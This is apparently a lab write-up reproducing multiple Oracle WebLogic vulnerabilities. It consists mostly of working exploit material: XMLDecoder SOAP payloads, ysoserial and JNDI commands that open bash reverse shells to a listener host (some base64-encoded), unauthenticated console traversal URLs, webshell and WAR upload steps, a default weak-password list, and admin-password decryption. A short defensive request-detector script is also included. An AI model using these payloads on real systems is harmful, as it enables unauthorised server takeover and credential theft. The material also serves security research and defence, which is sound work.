Weblogic vulnerability recurrence

0x01: Weblogic environment setup

Installation package: if you need a different version, download it directly from the official website:

https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html

Double click to open

image-20210812014953267

Click Next

image-20210812015006342

image-20210812015037060

image-20210812015118942

image-20210812015147579

image-20210812015429032

Set account password, Oracle@123

image-20210812015619742

image-20210812015737257

image-20210812015756485

image-20210812015845200

Go to the directory and double-click

image-20210812020312756

Enter account password

image-20210812020550111

Then access port 7001

image-20210812021659068

Successfully built

image-20210812021716152

0x02: WebLogic XMLDecoder Deserialization Vulnerability (CVE-2017-10271)

1. Vulnerability Principle

The cause of CVE-2017-10271 is that the WebLogic WLS Security component exposes webservice endpoints that use XMLDecoder to parse XML data supplied by the user. A deserialization flaw during parsing leads to arbitrary command execution; by sending carefully constructed XML, an attacker can obtain a reverse shell and thereby server privileges.

2. Affected version

10.3.6.0
12.1.3.0.0
12.2.1.1.0
12.2.1.2.0

3. Vulnerability address

Default port: 7001
/wls-wsat/CoordinatorPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/ParticipantPortType
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/RegistrationRequesterPortType11

4. Vulnerability Recurrence

Version number 10.3.6.0

image-20210808191419130

Preliminary check: accessing 192.168.88.133:7001/wls-wsat/CoordinatorPortType returns the page shown below, which suggests the vulnerable component is present.

image-20210808191539802

A similar page appears when accessing any of the vulnerability paths above. We use the following request to verify whether the vulnerability exists:

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.88.133:7001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ADMINCONSOLESESSION=llYJhP8TvzYxpGhV4LFc1l6QS7PpryrXbZkDy5H86nLSxspLvWhq!-2109495751
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: text/xml
Content-Length: 596

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java><java version="1.4.0" class="java.beans.XMLDecoder">
        <object class="java.io.PrintWriter">
          <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string>
          <void method="println">
            <string>
              <![CDATA[
<% out.print("hello"); %>
              ]]>
            </string>
          </void>
          <void method="close"/>
        </object>
      </java></java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>

The response status is 500.

image-20210808192700017

Access:

http://192.168.88.133:7001/bea_wls_internal/test.jsp

image-20210808192828592

The file was written successfully, so the vulnerability exists.

Next, obtain a reverse shell. The POST body is:

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java version="1.4.0" class="java.beans.XMLDecoder">
        <void class="java.lang.ProcessBuilder">
          <array class="java.lang.String" length="3">
            <void index="0">
              <string>/bin/bash</string>
            </void>
            <void index="1">
              <string>-c</string>
            </void>
            <void index="2">
              <string>bash -i &gt;&amp; /dev/tcp/192.168.88.133/8888 0&gt;&amp;1</string>
            </void>
          </array>
          <void method="start"/>
        </void>
      </java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>

Start the listener.

image-20210808193100371

Reverse shell received.

image-20210808193209039

0x03: Weblogic WLS Core Components deserialization command execution vulnerability (CVE-2018-2628)

1. Vulnerability Principle

In WebLogic, an attacker uses an RMI interface other than the one checked by the blacklist to bypass WebLogic's blacklist restrictions; the loaded content is then parsed with readObject, causing a deserialization remote code execution vulnerability. The vulnerability is triggered through the T3 service. Any WebLogic instance with console port 7001 open enables the T3 service by default, and an attacker can obtain server privileges by sending constructed T3 protocol data.

The attacker side runs a JRMP listener with ysoserial. The reflection chain is the CommonsCollections payload built into ysoserial, which ultimately relies on sun.reflect.annotation.AnnotationInvocationHandler. The payload generated on the attacker side makes the deserializing WebLogic connect back to the listener; the listener returns the malicious serialized object, and WebLogic deserializes it, completing the attack.

In InboundMsgAbbrev, resolveProxyClass handles the RMI interface type, but it only checks for java.rmi.registry.Registry, so any other RMI interface bypasses the check. The core of the attack is JRMP (Java Remote Method Protocol). In this PoC, a RemoteObjectInvocationHandler is serialized; it uses a UnicastRef to establish a TCP connection to the remote end, obtains the object from the remote RMI registry, loads it back, and parses it with readObject, which deserializes the remote object and executes code.

2. Affected version

weblogic 10.3.6.0
weblogic 12.1.3.0
weblogic 12.2.1.2
weblogic 12.2.1.3

3. Vulnerability Recurrence

We first use nmap to check whether the T3 protocol is enabled.

image-20210817210044436

Use ysoserial to start a JRMP Server service

java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 9999 CommonsCollections1 "touch /tmp/1.txt"

image-20210808210455317

Use the CVE-2018-2628.py script to send the packets to the target WebLogic. Here CVE-2018-2628.py and ysoserial-0.0.6-SNAPSHOT-BETA-all.jar are placed in the same directory.

python CVE-2018-2628.py 192.168.88.133 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 192.168.88.133 9999 JRMPClient

image-20210817211509200

The file is written on the target machine.

image-20210808212015461

Reverse shell:

java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 9999 CommonsCollections1 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljg4LjEzMy8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}"

image-20210817211730233

Alternatively, an automated tool does this in one step. After the vulnerability is detected:

image-20210811135439834

Get shell:

image-20210817211745767

Reverse shell:

image-20210811135500971

Shell received:

image-20210811135703946

0x04: Weblogic Unauthorized Access + Arbitrary File Upload Vulnerability (CVE-2018-2894)

1. Vulnerability Principle

Two unauthenticated pages on the WebLogic management side allow arbitrary upload of jsp files, which yields server privileges. Oracle has fixed an arbitrary file upload vulnerability in the WebLogic Web Service Test Page. The Web Service Test Page is not enabled by default in production mode, so this vulnerability has certain limitations. The two pages are /ws_utc/begin.do and /ws_utc/config.do.

2. Affected version

weblogic 10.3.6.0
weblogic 12.1.3.0
weblogic 12.2.1.2
weblogic 12.2.1.3

3. Vulnerability Recurrence

image-20210811140819254

Unauthorized access to /ws_utc/config.do page

image-20210811144459267

Set the Work Home Dir to the css static-file directory of the ws_utc application, which can be accessed without any permission:

/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css

Then click Security -> Add on the left and upload the webshell:

image-20210811144715050

The final file name is timestamp_filename

image-20210811144756908

Then visit http://192.168.88.133:7001/ws_utc/css/config/keystore/1628662540500_JspSpy.jsp to execute webshell

image-20210811144919221

0x05: Weblogic Unauthorized Access + Remote Command Execution Vulnerability (CVE-2020-14882 &CVE-2020-14883)

1. CVE-2020-14883: Permission Bypass Vulnerability

A remote attacker can craft special HTTP requests to take over the WebLogic Server Console without authentication.

2. CVE-2020-14882: Code Execution Vulnerability

Combined with the CVE-2020-14883 vulnerability, a remote attacker can construct a special HTTP request to take over the WebLogic Server Console without authentication and execute arbitrary code in the WebLogic Server Console.

3. Affected version

Weblogic 10.3.6.0.0
Weblogic 12.1.3.0.0
Weblogic 12.2.1.3.0
Weblogic 12.2.1.4.0
Weblogic 14.1.1.0.0

4. Vulnerability Recurrence

We visit:

http://192.168.88.133:7001/console/images/%2E%2E%2Fconsole.portal?_nfpb=true&_pageLabel=AppDeploymentsControlPage&handle=com.bea.console.handles.JMXHandle("com.bea:Name=base_domain,Type=Domain")

This goes directly to the management console.

image-20210811150233293

The permissions at this time are very low and applications cannot be installed in the background, so it needs to be combined with the CVE-2020-14883 vulnerability. There are two ways to exploit this vulnerability.

  • One is through com.tangosol.coherence.mvel2.sh.ShellSession

  • The second is through com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext

Use com.tangosol.coherence.mvel2.sh.ShellSession to execute commands:

http://192.168.88.133:7001/console/images/%2E%2E%2Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch /tmp/fuck');");

File created successfully

image-20210811151016959

This exploitation method only works on WebLogic 12.2.1 and above, because the com.tangosol.coherence.mvel2.sh.ShellSession class does not exist in version 10. When using the com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext class, you need to construct a malicious XML file:

<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg>
      <list>
        <value>/bin/bash</value>
        <value>-c</value>
        <value><![CDATA[bash -i >& /dev/tcp/192.168.88.133/1234 0>&1]]></value>
      </list>
    </constructor-arg>
  </bean>
</beans>

Then issue the following request through this class, allowing Weblogic to load this xml, execute the commands in it, and successfully bounce back to the shell.

http://192.168.88.133:7001/console/css/%2E%2E%2Fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://192.168.88.133:8888/1.xml")

image-20210811162627772

0x06: Weblogic frontend arbitrary file read && weak password && backend getshell

1. Arbitrary file read

This environment uses a weak password:

  • Username: weblogic

  • Password: Oracle@123

Visit http://your-ip:7001/hello/file.jsp?path=/etc/passwd and you can see that the passwd file is read successfully.

image-20210812000955084

Then we can read the backend user's ciphertext and the key file. The WebLogic password is encrypted with AES (3DES in older versions); since this is symmetric encryption it can be decrypted, so we only need the user's ciphertext and the encryption key. These two files are located under base_domain and are named SerializedSystemIni.dat and config.xml. In this environment they are ./security/SerializedSystemIni.dat and ./config/config.xml (relative to the current directory /root/Oracle/Middleware/user_projects/domains/base_domain). SerializedSystemIni.dat is a binary file, so it must be read with Burp Suite; downloading it directly with a browser may introduce interfering characters. Select the garbled string read in Burp, right-click, and choose "copy to file" to save it as a file:

image-20210812003319040

config.xml is the global configuration file of base_domain, so it contains a lot of unrelated content. Find the encrypted-password value, which is the encrypted administrator password; be careful not to pick the wrong one:

image-20210812001418366

Then use the decrypt tool provided in the lab environment to decrypt it.

image-20210818210732050

2. Commonly used Weblogic weak passwords

system:password
weblogic:weblogic
admin:security
joe:password
mary:password
system:security
wlcsystem:wlcsystem
wlpisystem:wlpisystem

3. Getting a shell by uploading a WAR package in the console

3.1 Introduction to WAR
  • A WAR is a web module that can be run directly. It is usually used for websites and is packaged and deployed into a container. After the WAR package is placed in the web directory, it is decompressed automatically, which is equivalent to publishing.
  • Simply put, a WAR package is a packaged JavaWeb program. It includes the compiled class files, dependency packages, configuration files, and all website pages (html, jsp, etc.). A WAR package can be understood as a web project containing everything the project needs.
3.2 WAR packaging
  • Pack files into a WAR archive under Linux:
jar -cvf blog.war *
  • View the contents of the WAR:
jar -tf blog.war
  • You can also compress the files into a zip first and then change the extension to war.

Click Deploy:

    image-20210812004041997

Click to upload the file:

image-20210812004118168

Then upload the WAR package, continue to the next step, and finish. Then connect with Behinder (Ice Scorpion):

http://192.168.88.133:7001/shell/shell.jsp

image-20210812004447579

0x07: Weblogic IIOP protocol deserialization RCE (CVE-2020-2551)

1. Vulnerability Principle

The WebLogic IIOP protocol is enabled by default and listens on port 7001 together with the T3 protocol. The main cause of this vulnerability is incorrect filtering of the JtaTransactionManager class. Its parent class, AbstractPlatformTransactionManager, was added to the blacklist in an earlier patch. The T3 protocol filters through the resolveClass method, which also reads the parent class, so T3 filtering is not affected. The IIOP protocol also uses the blacklist, but it does not filter through resolveClass; by default it only checks the class name itself. JtaTransactionManager is not on the blacklist, and it is subject to JNDI injection.

2. Vulnerability Recurrence

Use marshalsec to start a malicious RMI service:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.88.133:8888/#Exploit" 9999

Compile the EXP locally, then start a local web server to host it.

Exploit.java:

import java.io.IOException;

public class Exploit {
    // static initializer: runs as soon as the class is loaded
    static {
        try {
            java.lang.Runtime.getRuntime().exec(new String[]{"cmd", "/c", "calc"});
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    public static void main(String[] args) {
    }
}

Compile:

javac Exploit.java

Run the jar from the command line:

java -jar weblogic_CVE_2020_2551.jar 192.168.88.133 7001 rmi://192.168.88.133:1099/Exploit

Reproduction failed...

0x08: Weblogic remote code execution vulnerability (CVE-2021-2109)

Vulnerability Principle

This is a remote code execution vulnerability in WebLogic. It is a JNDI injection that allows attackers to achieve remote code execution.

1. Affected version

10.3.6.0.0
12.1.3.0.0
12.2.1.3.0
12.2.1.4.0
14.1.1.0.0

2. Vulnerability Recurrence

Reference link https://mp.weixin.qq.com/s/-ExbVwY7K3fY07h-KP4DEA

Docker is used here to build the environment

docker pull ismaleiva90/weblogic12
docker run -d -p 49163:7001 -p 49164:7002 -p 49165:5556 ismaleiva90/weblogic12:latest

Visit http://your-ip:49163/console to see the page, User: weblogic Pass: welcome1

Start the LDAP service:

java -jar JNDIExploit-v1.11.jar -i 192.168.88.133

Then send the request:

POST /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle("ldap://192.168.88;133:1389/Basic/WeblogicEcho;AdminServer") HTTP/1.1
Host: 192.168.88.133:49163
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
cmd:bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljg4LjEzMy8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}
Connection: close
Referer: http://192.168.88.133:49163/console/console.portal?_nfpb=true&_pageLabel=HomePage1
Cookie: ADMINCONSOLESESSION=5ZY9z_8Wg654bjnM0Hmf8bqUjHKmT7Drs0qIkallCxuU154ML2u5!692946862
If-Modified-Since: Wed, 21 May 2014 19:34:20 GMT
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

image-20210813124455254

Reverse shell received:

image-20210813124959775

2.1 Combining with unauthorized access
Combined with the WebLogic console unauthorized access vulnerability, commands can be executed without logging in:
/console/css/../consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle("ldap://192.168.88.133:1389/Basic/WeblogicEcho;AdminServer")

The following POC requires being logged in to the backend; if you are not authenticated, use the one above.
/console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle("ldap://xxx.xxx.xxx;xxx:1389/Basic/WeblogicEcho;AdminServer")
GET /console/css/%2e%2e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle("ldap://192.168.88;133:1389/Basic/WeblogicEcho;AdminServer") HTTP/1.1
Host: 192.168.88.133:49163
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.88.133:49163/console/login/LoginForm.jsp
cmd:id
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

image-20210813131144136
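As an added defender-side example (not part of the original write-up), the following Python classifies raw HTTP requests against the request patterns shown in sections 0x02, 0x04, 0x05 and 0x08: the XMLDecoder WorkContext body sent to a /wls-wsat/ endpoint, the /ws_utc/ test pages, the %2E%2E%2F traversal and gadget handle parameters on console.portal, and the JndiBindingHandle LDAP reference together with the cmd header. The sample requests and the host 10.0.0.5 are constructed, not captured traffic.

```python
import re
from urllib.parse import unquote

# Constructed sample requests (not captured traffic); 10.0.0.5 is a placeholder host.
SAMPLES = {
    "xmldecoder": (
        "POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: 10.0.0.5:7001\nContent-Type: text/xml\n\n"
        '<soapenv:Envelope><soapenv:Header><work:WorkContext>'
        '<java class="java.beans.XMLDecoder"/></work:WorkContext></soapenv:Header></soapenv:Envelope>'
    ),
    "ws_utc": "POST /ws_utc/config.do HTTP/1.1\nHost: 10.0.0.5:7001\n\n",
    "console_gadget": (
        "GET /console/images/%2E%2E%2Fconsole.portal?_nfpb=true&_pageLabel=HomePage1"
        '&handle=com.tangosol.coherence.mvel2.sh.ShellSession("x") HTTP/1.1\nHost: 10.0.0.5:7001\n\n'
    ),
    "jndi": (
        "GET /console/css/%2e%2e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true"
        "&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle"
        '("ldap://10.0.0;9:1389/Basic/WeblogicEcho;AdminServer") HTTP/1.1\n'
        "Host: 10.0.0.5:7001\ncmd: id\n\n"
    ),
    "benign": "GET /console/login/LoginForm.jsp HTTP/1.1\nHost: 10.0.0.5:7001\n\n",
}

def parse_request(raw):
    """Split a raw HTTP request into method, decoded target, headers and body."""
    head, _, body = raw.partition("\n\n")
    lines = head.splitlines()
    parts = lines[0].split(" ")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    # unquote so %2E%2E%2F and %2e%2e/ both become a literal "../"
    return {"method": parts[0], "target": unquote(" ".join(parts[1:-1])),
            "headers": headers, "body": body}

def detect(raw):
    """Return the labels of the request patterns from this write-up that match."""
    req = parse_request(raw)
    target, body, headers = req["target"], req["body"], req["headers"]
    path = target.split("?", 1)[0]
    hits = []
    # 0x02: XMLDecoder payload carried in the SOAP WorkContext header to a wls-wsat endpoint
    if path.startswith("/wls-wsat/") and "WorkContext" in body and "XMLDecoder" in body:
        hits.append("CVE-2017-10271")
    # 0x04: the Web Service Test Page endpoints, which should not be reachable in production
    if path.startswith("/ws_utc/"):
        hits.append("CVE-2018-2894")
    # 0x05: traversal out of the unauthenticated /console/images or /console/css directory
    if "/console/" in path and "/../" in path:
        hits.append("CVE-2020-14882")
    # 0x05: a handle parameter naming one of the two gadget classes
    if "handle=" in target and re.search(r"ShellSession|FileSystemXmlApplicationContext", target):
        hits.append("CVE-2020-14883")
    # 0x08: a JndiBindingHandle pointing at an attacker-controlled LDAP/RMI server
    if "JndiBindingHandle" in target and re.search(r"(ldap|rmi)://", target):
        hits.append("CVE-2021-2109")
    # 0x08: the cmd header that the JNDIExploit echo payload reads
    if "cmd" in headers:
        hits.append("cmd-header")
    return hits
```

Run `detect()` over each entry of `SAMPLES` (or over requests pulled from an access log) to see which pattern fires; the benign console login page produces no hit.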

0x09: Weblogic T3 deserialization (CVE-2021-2394)

1. Vulnerability Recurrence

Here we reuse the CVE-2020-14882 environment.

The command is as follows:
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "touch /tmp/aaa.txt" -A 192.168.88.133
-C [command to execute]
-A [IP address on which to open the LDAP service]

image-20210813135257223

Send the request:

image-20210813135317065

File created successfully

image-20210813135826899

Reverse shell; remember to encode the command.

image-20210813140109238

0x10: Several ways to write shell in weblogic

For deserialization vulnerabilities, if you already obtain system or root privileges there is no need to upload a webshell; but if you only have permission to install applications through the web, upload one to obtain greater privileges. Uploading requires knowing the physical path, which can be found at several locations, such as the following three:

1. Method 1: Write webshell in console images

\Oracle\Middleware\wlserver_10.3\server\lib\consoleapp\webapp\framework\skins\wlsconsole\images\shell.jsp
http://*.*.*.*:7001/console/framework/skins/wlsconsole/images/shell.jsp

2. Method 2: Write to the uddiexplorer directory

\Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\uddiexplorer\<random characters>\war\shell.jsp
Visit http://*.*.*.*:7001/uddiexplorer/shell.jsp

3. Method 3: Write to the application installation directory

\Oracle\Middleware\user_projects\domains\application\servers\AdminServer\tmp\_WL_user\<project name>\<random characters>\war\shell.jsp
Visit http://*.*.*.*:7001/<project name>/shell.jsp

https://xz.aliyun.com/t/10365

https://cloud.tencent.com/developer/article/1861375

https://python.iitter.com/other/130547.html